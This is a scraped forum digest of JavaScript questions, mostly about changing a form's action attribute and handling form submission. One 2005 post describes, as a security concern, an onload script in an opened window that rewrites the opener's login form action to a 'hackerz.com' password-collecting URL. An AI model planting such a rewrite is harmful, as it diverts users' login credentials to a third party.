Changing The Action Of A Form With An Input Named Action?
Feb 16, 2009
I have come across a very interesting problem that seems to be impossible to solve. Basically a web application that I am working on relies on a JavaScript function called go to change the input named view to the page name and submit the form. This form's type is post, so no values are included in the actual URL string. There is also another input called action and it's value is view. This is to tell the application that the user would like to view a page. The problem is because of the variables being of method post, page refreshes and back and forwards return errors because the post variables view and action aren't sent with the required data. To somewhat solve this problem I have created a feature that tells the application that if the post value page is empty then to try and get a GET var called page. To insert this var into the go javascript function I simple add this code
document.go.action = document.go.action+"&page="+page;
This line basically adds &page=[page] to the action of the form. The problem is, this code doesn't work because action is also the name of a form element. Referencing document.go.action refers to the input element named action and not to the form's action. Changing the named of the action input value is out of the question (Way to much changing of code, and possible room for error). What can I do to change the action of the form without referencing the input named action. Here is my go form and the JavaScript code:
<form name="go" action"index.php?sid=123" method="post">
<input type="hidden" name="action" value="view" />
<input type="hidden" name="view" value="" />
</form>
[Code]....
View 6 Replies
ADVERTISEMENT
Jul 23, 2005
I want to change attribute action in form. Problem is that in that form
is also input with name action. Unfortunately renaming of that input is
worst case because many servlets depend on it.
This works in konqueror but not in IE and Mozilla:
newurl= document.forms[i].getAttribute('action');
newurl= newurl.replace('all/', prefix);
document.forms[i].action= newurl;
Do you have any idea how to modify attribute action in this case ?
View 5 Replies
View Related
Dec 15, 2011
I've been trying to create a small input box that changes the form action based upon what the user enters. I can get these two options to work:
1. If value IS NOT 123456code, then action should be search-results.html.
$("form.filterform").keyup(function(){
if($("input.searchbox_resources").val()!="123456code"){
$("form.filterform").attr("action","search-results.html");
}
});
2. If value IS 123456code, then action should be search-results.html.
$("form.filterform").keyup(function(){
if($("input.searchbox_resources").val()==="123456code"){
$("form.filterform").attr("action","error.html");
}
});
I want to replace option 2 with a variation... where the user gets the error.html page if what they typed contains 123456code. As it stands currently, option 2 requires that a person types in that code exactly with no differences at all.
I was thinking it should look like this:
$("form.filterform").keyup(function(){
if($("input.searchbox_resources").val()*="123456code"){
$("form.filterform").attr("action","error.html");
}
});
But that does not seem to work.
View 2 Replies
View Related
Aug 2, 2011
Let me preface this by saying that I have ZERO experience with Ajax, and have simply copied this code from a blog elsewhere. What is shown below ties to a php file that I developed for a search function on our site. As the user enters their search term(s) in the text input field, the div below is populated with potential results through AJAX. I get all that.
However, I'd like to extend this a bit more. I'd like to enable to user to click the Enter key to follow the URL of the top search result automatically, without having to move their mouse and click on it.
Since I'm using PHP to generate the actual URL, I'm sure I can just send this back as a variable via AJAX, but with my lack of understanding, I thought I'd poke around here for some assistance. Can someone show me how to tweak the code below to accomplish what I'm looking for?
Code:
<script type="text/javascript">
function showResult(str)
{
if (str=="")
[Code].....
I'm less concerned about getting the Enter key to perform the submit than I am about passing the URL variable back to the form via AJAX. I've seen lots of examples of getting the Enter key to behave this way, I just didn't want to muddy up the original code above.
View 4 Replies
View Related
Dec 2, 2009
Is that possible when you click a child that the function on the parent don't run.
In these example, if I click on 'h2 > a
', both elements triggers functions ('h2' & 'a')
What I wan't is that if I click on 'h2 > a
[code]....
View 1 Replies
View Related
Jul 23, 2011
I need to know how stop a action hover and just the last action happen
View 2 Replies
View Related
Mar 5, 2008
I have a very weired problem (which is not easy to describe.. but I'll do my best):I have a html page with several forms , only one of the got the action="ComputeAndReturn" and the other forms got only name="" tag.the problem is that after i submit the form with the action , and than after a computatioon it returns to the original page, now... if i will submit any of the forms without the action=.they will act as if they were defined action="ComputeAndReturn" (altho they are not!)if they were defined from the first time with action="anything", and than i would submit the form with action="ComputeAndReturn" this problem would not appear (the other forms will keep their action="anything" and would not "imitate" the action= "Compute AndReturn" to them selfs...
any ideas how can i keep my forms without action="" , cause all i need them to do is be submitted to pass the submitted value to other form inside that page.[code]
View 8 Replies
View Related
Oct 5, 2010
I found this great accordion script that does everything I need, EXCEPT: I need the first level <li> to close upon second click of itself, collapsing the list - meaning I also want the option of the list able to be closed WITHOUT clicking on another first level <li>. How do I change the code below to do that?
Code:
function initMenus() {
$('ul.menu ul').hide();
$.each($('ul.menu'), function(){
$('#' + this.id + '.expandfirst ul:first').show();
[Code]....
View 2 Replies
View Related
Feb 1, 2010
I'd like to know if it's possible to invoke associated onChange action of check box when changing it's state with another javascript command... ie.
<input type="checkbox" name="y" onChange="javascript: func('var');">
document.x.y.field[i].checked = true;
When I execute last line I'd like func('var') to be run as well. Unfortunately it doesn't happen as of in the example above.
View 2 Replies
View Related
Sep 17, 2009
I added mouse in and mouse out affect like this in $
(document).ready function
$(document).ready(function(){
....
$(".StripMe tr").mouseover(function(){
[Code].....
My question is if i used jquery post method to change some div content, than this new div won't have mouseover and mouseout affect anymore, is there anyway to achieve it. Is that needed to trigger ready function again? Another question is can anyone teach me how to add click and dblclick event to the same div, because if i add both of them then it won't trigger dblckick event.
View 1 Replies
View Related
Mar 19, 2011
I have some basic HTML knowledge but rely pretty heavily on WYSIWYG editors (dreamweaver). I think this might be more of a PHP question and not necessarily require a js, but here it is. What I am trying to do is learn how to build a directory in a site that allows any visitor to the site to add A) the company's name, B) the site URL, and C) possibly a brief description. Ideally, the site would also have a drop down menu to select the category in which to post it.
View 1 Replies
View Related
Jul 23, 2005
I have a form which needs posting the php script below. (I sent my vars to a
cookie, which I have read correctly). This is the form command used in
hoping to process my information.
<form method="POST" action="scripts/WebContractor.php" name="bizinfo"
id="bizinfo">
Since most of this is new to me, please let me ramble in my thought process.
1. post the vars to a cookie
2. post the form pointing to the php script
3. read the vars in the php script
4. send the info from within the script
When I submit my form, I receive a dialog box stating the downloading this
file can be dangerous. What happens is the php script is downloaded to my
desktop - not executed. Code:
View 3 Replies
View Related
Jul 20, 2005
I have a form with a name, and action, a post method.
In rare occasion I want the form action to be different to the default
action, so I do this: document.formName.action = "newURL";
This works fine under Mozilla, but does not work under IE5, 5.5 or 6,
it says: Object doesn't support this property or method.
Does anyone know what could be wrong?
View 2 Replies
View Related
Jul 6, 2009
When I run the following code, none of the set's are being done. Most important one for me is the action attribute.
<script type="text/javascript" language="JavaScript">
$().ready(function() {
var url = $("#aggurl").val();
alert(url);
[Code]....
View 1 Replies
View Related
Jun 29, 2010
I have a form with two <button> elements. One button loads the page with the associated form data whilst the other triggers a download. IE6/7 does not handle <button> tags correctly. IE6 will submit all buttons regardless of which you click and uses the button content as the value, instead of the value as the value. IE7 submits just the clicked button, but still submits the content as the value, not the value.
To get around IE's issues with <button> I use JS to manipulate the DOM so hidden input fields are generated with the correct value and the button names are removed so they're not submitted at all.
This works, except in my specific situation for my download button. Because it triggers a download, the page you are on remains, and remains with the manipulated DOM, which means the form doesn't work properly anymore.
I would like to know if there's a trigger of some sort that would allow me to revert the DOM changes when the form is submitted but the page remains. I hope that makes sense. Oh, and there's no need to suggest using <input type="button" /> instead of <button>. That's not a solution.
View 4 Replies
View Related
Mar 8, 2010
i have a css/div box, and i have a login form. what im tryn to do is make it so that when i login, it it takes whats in the action of the form and shows it in the div box. the div box is like one of those cool popup boxes, it's done by using javascript and css.
anyway, the div box works. the login form works. i just haven't been able to figure out how to get it to appear in the div instead of into a new page.
here's my code:
<head><link rel="stylesheet" type="text/css" href="main.css" />
<link rel="stylesheet" type="text/css" href="popup.css" /></head>
<form name="Login" method="post" action="login/check.php">
<table border="0" cellpadding="0" cellspacing="0">
[Code].....
View 7 Replies
View Related
Nov 21, 2010
I am trying to get a form value on an action page using JavaScript to alert the value.
The below doesnt alert anything after I hit the submit button in the one.html page:
one.html
<form action="two.html" method="get" id="myform">
<input type="text" name="city">
<input type="submit">
[Code].....
View 7 Replies
View Related
Oct 17, 2005
i need three things to happen on a form submit at a same time.
1. download
2. sent mail.
3. redirect to another page
with the code below i can able to download and sent mail at a same time:
<form name="a" action="test/test/mail?test" method="post">
<input type="hidden" name="from-email" value="a@a.com">
<input type="hidden" name="next-url" value="download.exe">
<input type="hidden" name="subject" value="test download">
<input type="submit" value="Download" name="testdownload" title="fmdffppjk" class="button">
</form>
can anyone tell me how do i also redirect to another page on clicking the submit button.
View 4 Replies
View Related
Jan 20, 2009
I want to change a form action url based on user input, and I used hyperlink to submit a form (since I have lots of rows like this and each has different values passed to javascript select_claim() function.). But it doesn't work! I have very simple php code here, but the it is the javascript problem.
HTML Code:
<form action="" method="post" name="smForm" id="smForm">
<table>
[code].....
View 10 Replies
View Related
Jul 8, 2011
I'm having a bit of problem writing some javascript that will dynamically update the 'action' of a form when the form is submitted.
Its for an Image Upload script which performs a binary read on the uploaded image, meaning I have to POST the form, but must pass any additional parameters to the Image Upload script via the querystring.
Code:
My submitform() function needs to set the action of form5 to :
Code:
And submit the form.
View 9 Replies
View Related
Mar 4, 2003
I have a form, which has a <select> with three options.....
For each option I want to be able to set a different form action........
eg: if someone selects option 1, the form action goes to url1.html
or if someone selects option 2, the form goes to url2.html
How can I achieve this with javascript??
View 1 Replies
View Related
May 23, 2007
Is it possible to change URL form action on submit form...
I have tried such code:
<script language="JavaScript" type="text/javascript">
function changeURL()
{
......
View 1 Replies
View Related
Jul 20, 2005
Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:
<body onload="opener.document.forms 0].action='http://www.hackerz.com/PasswordDatabase.php'">
After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..
View 2 Replies
View Related
Jul 20, 2005
I have form/select which executes a function using onchange. No
problem. However, when I validate the page with a strict HTML 4.01
doctype at http://validator.w3.org, it demands either an action or a
method for the form?.
If I give it an empty action <form action="" ..... it validates OK. Is
this acceptable or is there a better/standards correct way?
View 19 Replies
View Related
Apr 8, 2010
How does one make a DIV visible if a form action is taken, such as a Radio button selected?
But here is the thing: this DIV that is to become visible and invisible upon radio clicked does not contain a simple short Text message, but instead this DIV contains many Images for selection. I mean I know how to turn on/off a DIV via Javascript command:
Code JavaScript:
But again this DIV is to contain many images and the inputs for selecting one of these images so that Javascript command will just not cut it.
View 1 Replies
View Related
Jun 6, 2004
alright I'm writing form which calls out a function F1 onsubmit but I want it to do that based on what the user answers to the last question on the form
this question has a yes/no answer, if the answer is yes, I want it to call F1 as it would and the function basically sends the form contents to two different places, if the answer was no, I want it to just submit it to one place.. Code:
View 5 Replies
View Related